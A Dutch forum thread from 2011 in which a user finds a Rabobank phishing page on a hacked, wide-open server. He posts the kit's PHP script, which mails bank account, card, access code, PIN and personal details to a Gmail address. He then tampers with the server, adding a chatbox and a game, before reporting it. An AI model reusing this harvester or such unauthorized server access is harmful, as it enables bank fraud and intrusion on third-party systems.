spammer pesten

eikeltje

Aantal posts: 31
Aantal reacties: 946

Kreeg een slechte spam van een rabobank-fisher binnen op de url:
http://www.consistentproducts.com/cellphoneaccents.samsung/docs/rabobank.html

Even naar de site waarop de pagina staat gesurft:
http://consistentproducts.com/

blijkt dat daar een filemanager staat die volledig openstaat... ff chmod 600 gedaan :-)

Weet iemand nog leuke dingen om te doen?

24-02-2011 om 11:34 | 23 reacties | 8 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

Ook maar een mailtje met code naar abuse rabobank, abuse google en abuse godaddy gestuurd... we kunnen natuurlijk braaten naar rabobank.php (dan moet weer chmod 644 gedaan worden):

24-02-2011 11:40:52 | # | 0 |

eikeltje

Aantal posts: 31
Aantal reacties: 946



                    $ip = getenv("REMOTE_ADDR");

                    $message .= "-------------------Rabobank----------------------\n";

                    $message .= "Rekeningnummer.: ".$_POST['AuthId']."\n";

                    $message .= "Pasnummer.: ".$_POST['AuthBpasNr']."\n";

                    $message .= "Toegangscode.: ".$_POST['AuthCd']."\n";

                    $message .= "UW PIN.: ".$_POST['uwpin']."\n";

                    $message .= "dob.: ".$_POST['dod']."\n";

                    $message .= "dob1.: ".$_POST['dom']."\n";

                    $message .= "dob2.: ".$_POST['doy']."\n";

                    $message .= "Naam.: ".$_POST['naam']."\n";

                    $message .= "Adres.: ".$_POST['adres']."\n";

                    $message .= "Postcode.: ".$_POST['postcode']."\n";

                    $message .= "Telefoon Priv�.: ".$_POST['Prive']."\n";

                    $message .= "IP: ".$ip."\n";

                    $message .= "---------------Created By CADOTUNJI------------------\n";

                    

                    $recipient = "southwat27@gmail.com";

                    $subject = "Rabobank";

                    $headers = "From: (�`�._.�[CADOTUNJI Inc�]�._.���)";

                    $headers .= $_POST['eMailAdd']."\n";

                    $headers .= "MIME-Version: 1.0\n";

                    mail("$to", "Rabobank", $message);

                    if (mail($recipient,$subject,$message,$headers))

                    {

                    header("Location: index.html");

                    

                    }

                    else

                    {

                    echo "ERROR! Please go back and try again.";

                    }

24-02-2011 11:41:31 | # | 0 |

Snorlax

Aantal posts: 13
Aantal reacties: 2065

Welk spel is dit? Hoe moet je schieten?

24-02-2011 11:47:17 | # | 1 |

LuDo

Aantal posts: 86
Aantal reacties: 8602

Weet iemand nog leuke dingen om te doen?

Maak er een chatbox van.

24-02-2011 13:07:01 | # | 8 |

Ketsman

Aantal posts: 356
Aantal reacties: 20050

Ja, neem van mij aan, dat is toch wel het ergste wat je kan overkomen; Ludo die op je side komt chatten.

24-02-2011 13:16:13 | # | 7 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

LOL :-)
http://consistentproducts.com/chat/shout.php

24-02-2011 13:30:58 | # | 3 |

LuDo

Aantal posts: 86
Aantal reacties: 8602

@eikeltje
Dan ga ik daar chatten en dan zie ik Ketsman daar dan wel weer meteen opduiken. Ik zou niet weten hoe maar een chatbox lijkt me een leuke.

24-02-2011 13:32:07 | # | 0 |

LuDo

Aantal posts: 86
Aantal reacties: 8602

Verrek, hij is al af. LOL!

24-02-2011 13:33:27 | # | 0 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

Ik zei toch dat de server wagenwijd openstaat.... Heb iedereen ingelicht die ingelicht kan worden en de phishing onklaar gemaakt....

24-02-2011 13:34:58 | # | 0 |

Ketsman

Aantal posts: 356
Aantal reacties: 20050

eikeltje voor FP!

24-02-2011 13:36:29 | # | 3 |

Weerman Rapsel

Aantal posts: 21
Aantal reacties: 12998

Held!

24-02-2011 13:42:06 | # | 0 |

reet

Aantal posts: 6570
Aantal reacties: 5947

F5 is er ook voor u

24-02-2011 13:42:21 | # | 0 |

Hayo Beckman

Aantal posts: 68
Aantal reacties: 2563

LOL @ Fred Teeven

24-02-2011 13:50:34 | # | 0 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

@Snor:
http://consistentproducts.com/chat/defense.html

schieten met de spatiebalk.... sturen met de pijltjes...

24-02-2011 13:52:59 | # | 5 |

Ketsman

Aantal posts: 356
Aantal reacties: 20050

Er is altijd een trut die het niet kan laten. Jammer, de pret zit erop.

24-02-2011 14:55:12 | # | 1 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

speelkwartier is voorbij....

Heb de eigenaar maar even gebeld in de VS, hij had al eerder naar godaddy gebeld maar die deden er niets aan. Zo te zien heeft hij zijn domein leeggegooid...

24-02-2011 14:55:25 | # | 1 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

Maar als je dacht echt graag wilt dan kan ik wel ergens een chatboxje neerzetten Kets...

24-02-2011 14:56:00 | # | 0 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

-zwitserland

24-02-2011 14:56:37 | # | 0 |

Ketsman

Aantal posts: 356
Aantal reacties: 20050

Nee, dank je. Ik moet nog steeds aan de kut van Patricia Paay denken.

24-02-2011 14:58:44 | # | 0 |

Hayo Beckman

Aantal posts: 68
Aantal reacties: 2563

"yes hello with little acorn from the netherlands. Knew you that your server stands car wide open? I should there but something on do when I was you"

24-02-2011 15:02:14 | # | 11 |

Weerman Rapsel

Aantal posts: 21
Aantal reacties: 12998

Godver, lig gestrekt om little acorn. OLO!

24-02-2011 15:35:24 | # | 0 |

cspr, drukt van zich af

Aantal posts: 86
Aantal reacties: 2026

dat domein is natuurlijk ook gehakt, maar dat is logisch. (domein pesten heeft dus geen zin en treft onschuldigen)

24-02-2011 18:25:11 | # | 0 |

eikeltje

Aantal posts: 31
Aantal reacties: 946

Tuurlijk, daar ging het ook niet om, het was een script (ik vermoed css-file) op zijn domein die blijkbaar de filemanager geopend heeft. Aangezien hij nu alles verwijderd heeft staat het domein niet meer open en wordt het dus niet meer gebruikt voor phishing-pagina's door derden.

24-02-2011 18:59:31 | # | 0 |

Om te kunnen reageren moet je ingelogd zijn.